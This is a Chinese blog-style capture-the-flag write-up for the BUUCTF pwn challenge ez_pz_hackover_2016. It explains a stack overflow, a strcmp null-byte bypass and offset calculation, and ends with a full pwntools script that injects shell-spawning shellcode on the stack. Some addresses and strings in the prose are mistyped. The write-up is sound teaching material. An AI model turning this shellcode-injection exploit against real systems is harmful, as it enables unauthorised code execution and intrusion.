ez_pz_hackover_2016

最新推荐文章于 2024-12-23 00:29:18 发布
原创 最新推荐文章于 2024-12-23 00:29:18 发布 · 566 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#pwn #网络安全 #安全

本文详细解析了一个栈溢出漏洞的利用过程,通过checksec检查了保护设置,利用strcmp函数的特性构造payload,绕过限制,并在没有system函数和/bin/sh的情况下,通过栈可执行性直接将shellcode写入栈中,修改返回地址以执行shellcode。文章还展示了如何在GDB中调试并确定payload的具体内容和地址。

ez_pz_hackover_2016

使用checksec查看:
在这里插入图片描述
开启了完全RELRO,使整个 GOT 只读,放进IDA中查看:
在这里插入图片描述
header()函数是初始化函数,没用,主要程序流程在chall()中,直接看chall()函数:
在这里插入图片描述
首先程序会printf变量s在栈上的地址

然后接受用户输入0x3ff个字符

接着用strcmp()函数将用户输入的字符串和ceashme做对比,如果不同,退出程序。

如果相同,进入vuln()函数,我们跟进去查看:

很明显,一个栈溢出。

本题中并没有system函数以及/bin/sh,但栈可执行,所以可以直接将shellcode写入栈中,将返回地址修改成shellcode的地址即可。

strcmp()函数可用\x00绕过,开启gdb进行调试:
在这里插入图片描述
可以看到,0xffe781d2c,0xffe781d3r

随后输入的MMMM0xffe781da

我们需要将shellcode写到ebp+4处,也就是0xffe781ec距离我们真实写入的地方0x12

payload = b'crashme\x00'+b'M'*0x12

接下来解决shellcode的地址问题:

还是上面那张图,我们得到的栈上的地址,它在参数s栈上的相对位置是0x20,ebp+4的相对地址是0x3c,距离0x1c,所以可以用stack_addr-0x1c来表示返回地址。

exp:

from pwn import *

#start 
r = remote("node4.buuoj.cn",25436)
# r = process("../buu/ez_pz_hackover_2016")
context.arch = 'i386'
context.log_level='debug'

gdb.attach(r,'b *0x8048600')

#params
r.recvuntil('0x')
stack_addr = int(r.recv(8),16)

#attack
# payload=b'crashme\x00MMMM'
payload = b'crashme\x00'+b'M'*0x12 + p32(stack_addr-0x1c) + asm(shellcraft.sh())
r.sendline(payload)

r.interactive()
BUUCTF【ez_pz_hackover_2016
weixin_51055545的博客
02-14 1357
BUUCTF【ez_pz_hackover_2016】 例行检查 开了relro,其他保护机制都没开,扔到IDA中分析 漏洞分析 chall()函数中,有fgets(),但长度不够覆盖到返回地址,没法溢出,接着会获取s的长度,然后字符串检索,在这里我给出memchr()的定义:*C 库函数 void *memchr(const void str, int c, size_t n) 在参数 str 所指向的字符串的前 n 个字节中搜索第一次出现字符 c(一个无符号字符)的位置。 然后程序会有一个if检查,
[BUUCTF-pwn]——ez_pz_hackover_2016
Y_peak的博客
02-15 415
[BUUCTF-pwn]——ez_pz_hackover_2016 题目地址:https://buuoj.cn/challenges#ez_pz_hackover_2016 checksec一下,NX都没开,十有八九是让自己写shellcode了 在IDA中,main里面没什么可以看的. 在chall函数中发现,0x40C = 1036 > 1023无法栈溢出。不过总算找到可以写shellcode 的地方。 发现vuln函数,只要通过输入"crashme\x00"就可以绕过检查,执行vuln
3S软件
Zzzpiu的博客
12-29 525
地址:https://www.ixxin.cn/software.html 转载地址:https://www.ixxin.cn/software.html
BUUCTF ez_pz_hackover_2016
m0_73743784的博客
08-28 534
需要注意dest到ebp的距离,使用 IDA Pro 分析时并不一定是正确的,需要配合动态调试才能真正确定利用偏移值可以间接确定写入shellcode。
ctf【ez_pz_hackover_2016
HUANGliang_的博客
10-29 294
ez_pz_hackover_2016
[PWN] BUUCTF ez_pz_hackover_2016 1
空城惜梦的博客
06-08 905
[PWN] BUUCTF ez_pz_hackover_2016 1解题分析漏洞利用payload分析输入点与ebp距离的计算方法泄露的地址与shellcode的偏移量payload 解题分析 按照惯例先checksec一下,除了RELRO,其他都没开 执行,观察程序运行逻辑,给出一个地址,然后让我们输入name 32IDA打开程序,观察main函数,header()只是打印图形,chall()才是关键函数 在chall中先输出s的地址,之后fgets接收一个不大于1023(0x3ff)的字符到s的缓
[buu]ez_pz_hackover_2016
最新发布
Lt95625142的博客
12-23 520
所以这里我们回到的地址应该是在0x0xff8c1e90这个地址上,接下来我们有的地址是0xff8c1eac,怎么表示这个地址呢?这里很可能存在溢出了,这里可以控制我们返回地址的写入(当然这个题在这里打ret2libc也是可以的,但这里libc基地址不太好算(要不传统打法返回两次,这里返回打起来有点点麻烦没shellcode快))(这里其实我们有两个程序栈,一个是chall对应的栈,另一个是vuln对应的程序栈(这个理解成代码需要的内存空间),但这个算出来最后其实不是我们实际要覆盖的返回地址)
BUUCTF-ez_pz_hackover_2016
Rt1Text的博客
11-28 985
challC 库函数 - strcmp()C 库函数 int strcmp(const char *str1, const char *str2) 把 str1 所指向的字符串和 str2 所指向的字符串进行比较。strcmp只能比较字符串,比较数组和字符串常量,不能比较数字等其他形式的参数。两个字符串自左向右逐个字符相比(按ASCII值大小相比较),直到出现不同的字符或遇'\0'为止strcmp的返回值可控,传入空字符串即可strlen同样遇0截断。
memcpy
weixin_45959515的博客
08-26 244
memcpy指的是C和C++使用的内存拷贝函数,函数原型为void *memcpy(void *destin, void *source, unsigned n);函数的功能是从源内存地址的起始位置开始拷贝若干个字节到目标内存地址中,即从源source中拷贝n个字节到目标destin中。 memcpy(c, temp, sizeof(char) * temp_size); ...
BUUCTF pwn ez_pz_hackover_2016
菜的只能随便写写博客
02-21 2505
0x01 文件分析  没有不可执行栈和段上的读写保护,可以做到很多事情。   0x02 运行  输入name并且回显,上面还有一个地址。   0x03 IDA  主要的漏洞点在这个函数内部的,chall栈的大小很大,足够写入shellcode,之后的vuln函数会将s的数据复制到vuln的栈上面,但是复制的数据量远远大于栈的长度,会造成栈溢出。  并且此函数的栈的地址直接打印出来,不用再去...
EZ_USB通用驱动程序详细使用说明
标题:“EZ_USB 通用驱动程序说明”反映了一个特定于EZ_USB设备的通用驱动程序的相关信息。EZ_USB是由Cypress Semiconductor公司生产的一系列USB微控制器。该驱动程序是用于与这些USB设备进行通信的软件组件。在讨论...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值